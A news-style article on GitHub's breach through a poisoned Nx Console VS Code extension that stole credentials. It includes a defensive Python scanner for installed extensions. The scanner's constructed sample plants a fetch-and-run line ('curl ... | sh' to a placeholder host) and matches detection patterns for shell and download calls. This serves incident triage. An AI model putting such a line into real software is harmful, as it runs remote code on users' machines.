GitHub Breached via Malicious Nx Console Extension: 3,800 Repos Stolen
GitHub has officially confirmed that the breach of its internal repositories resulted from a compromise of an employee device involving a poisoned version of the Nx Console Microsoft Visual Studio Code (VS Code) extension. The attack, linked to the recent TanStack supply chain attack, allowed the cybercriminal group TeamPCP to exfiltrate approximately 3,800 repositories. GitHub's Chief Information Security Officer Alexis Wales stated there is no evidence of impact to customer information stored outside of internal repositories, though some internal repositories contain excerpts of customer support interactions. The company has taken steps to contain the incident and rotated critical secrets while continuing to monitor for follow-on activity. Other organizations impacted by the TanStack compromise include OpenAI, Mistral AI, and Grafana Labs. Organizations concerned about potential exposure can use an email breach checker to determine if their information was involved in related incidents.
The malicious version of the VS Code extension, nrwl.angular-console, was live on the Visual Studio Marketplace for a mere 18 minutes, between 12:30 p.m. and 12:48 p.m. UTC on May 18, 2026. According to OX Security researcher Nir Zadok, the trojanized extension appeared and behaved like the legitimate Nx Console but silently executed a shell command on startup that downloaded a hidden package from a planted commit on the official nrwl/nx GitHub repository. The command was disguised as a routine MCP setup task to avoid suspicion. This brief window was sufficient to distribute a credential stealer capable of harvesting sensitive data from 1Password vaults, Anthropic Claude Code configurations, npm, GitHub, and Amazon Web Services. Developers who may have installed the compromised extension should immediately rotate credentials and can verify their security posture using a password strength checker and a DNS leak test.
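The behaviour described above, an extension that shells out on activation to fetch a payload, is something a defender can triage for locally. The script below is an added example written for this article; it is not code from GitHub, OX Security, or the Nx project. It walks a VS Code extensions directory, reads each extension's package.json, flags the extension ID named in the article (nrwl.angular-console) so the installed version can be compared against the publisher's advisory, and greps each extension's entry-point script for child_process calls and download-style commands. The shell-use heuristics, the `~/.vscode/extensions` layout, and the two sample extensions it builds in a temporary directory are assumptions and constructed data; the malicious build's actual version number is not given in the article and is not assumed here.

```python
import json
import os
import re
import tempfile
from pathlib import Path

# Extension ID named in the article; the trojanized build shipped under this same ID.
AFFECTED_EXTENSION_ID = "nrwl.angular-console"

# Heuristics for "shells out / downloads something at startup". Constructed for this
# example; they are triage signals, not a signature for the real payload.
SHELL_PATTERNS = [
    re.compile(r"child_process"),
    re.compile(r"\b(exec|execSync|spawn|spawnSync)\s*\("),
    re.compile(r"\b(curl|wget)\b"),
    re.compile(r"raw\.githubusercontent\.com|/archive/[0-9a-f]{7,40}\.(zip|tar\.gz)"),
]


def scan_extension(ext_dir: Path) -> dict:
    """Inspect one installed extension directory and return what was found."""
    manifest_path = ext_dir / "package.json"
    if not manifest_path.is_file():
        return {}
    manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
    ext_id = f"{manifest.get('publisher', '?')}.{manifest.get('name', '?')}".lower()
    result = {
        "id": ext_id,
        "version": manifest.get("version", "?"),
        "dir": str(ext_dir),
        "affected_id": ext_id == AFFECTED_EXTENSION_ID,
        "shell_hits": [],
    }
    main = manifest.get("main")
    if main:
        entry = ext_dir / main
        # VS Code resolves "./out/extension" to out/extension.js
        if entry.suffix == "":
            entry = entry.with_suffix(".js")
        if entry.is_file():
            text = entry.read_text(encoding="utf-8", errors="replace")
            for pattern in SHELL_PATTERNS:
                match = pattern.search(text)
                if match:
                    result["shell_hits"].append(match.group(0))
    return result


def scan_extensions_root(root: Path) -> list:
    """Scan every extension directory under root (e.g. ~/.vscode/extensions)."""
    results = []
    for child in sorted(root.iterdir()):
        if child.is_dir():
            found = scan_extension(child)
            if found:
                results.append(found)
    return results


def flagged(results: list) -> list:
    """Keep only extensions that match the affected ID or show shell/download use."""
    return [r for r in results if r["affected_id"] or r["shell_hits"]]


def build_sample_root() -> Path:
    """Constructed sample data: one benign extension and one that mimics the
    described behaviour. The version string here is a placeholder, not the real one."""
    root = Path(tempfile.mkdtemp(prefix="vscode-ext-sample-"))
    benign = root / "example.hello-0.0.1"
    (benign / "out").mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps(
        {"publisher": "example", "name": "hello", "version": "0.0.1", "main": "./out/extension"}))
    (benign / "out" / "extension.js").write_text(
        "exports.activate = function (ctx) { console.log('hello'); };\n")
    suspect = root / "nrwl.angular-console-0.0.0-sample"
    (suspect / "out").mkdir(parents=True)
    (suspect / "package.json").write_text(json.dumps(
        {"publisher": "nrwl", "name": "angular-console", "version": "0.0.0-sample", "main": "./out/main.js"}))
    (suspect / "out" / "main.js").write_text(
        "const cp = require('child_process');\n"
        "exports.activate = function () { cp.execSync('curl -s https://example.invalid/setup.sh | sh'); };\n")
    return root


if __name__ == "__main__":
    root = Path(os.environ.get("VSCODE_EXT_DIR", str(Path.home() / ".vscode" / "extensions")))
    if not root.is_dir():
        root = build_sample_root()  # fall back to the constructed sample when no real install is present
    for hit in flagged(scan_extensions_root(root)):
        print(f"{hit['id']} {hit['version']} affected_id={hit['affected_id']} hits={hit['shell_hits']} ({hit['dir']})")
```

Set `VSCODE_EXT_DIR` to point at a non-default install location. A hit on the extension ID means the version should be checked against the publisher's advisory and the credential rotation above carried out; a shell-use hit on any other extension is a prompt to read its entry point, since many legitimate extensions spawn language servers and will also match.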
Jeff Cross, co-founder of Narwhal Technologies (nx.dev), acknowledged that the incident highlights the need for deeper, fundamental changes to how open source maintainers approach developer tooling security and distribution. The company has begun conversations with other high-profile open source maintainers about addressing structural problems in software supply chain security. TeamPCP has rapidly gained notoriety for large-scale supply chain attacks targeting widely used open-source projects and security-adjacent tools. Organizations should review their privacy and security settings and ensure their development pipelines have proper SSL/TLS verification mechanisms in place. The assumption the open source ecosystem has operated under for years, implicit trust in tooling and distribution channels, no longer holds in the face of sophisticated threat actors like TeamPCP.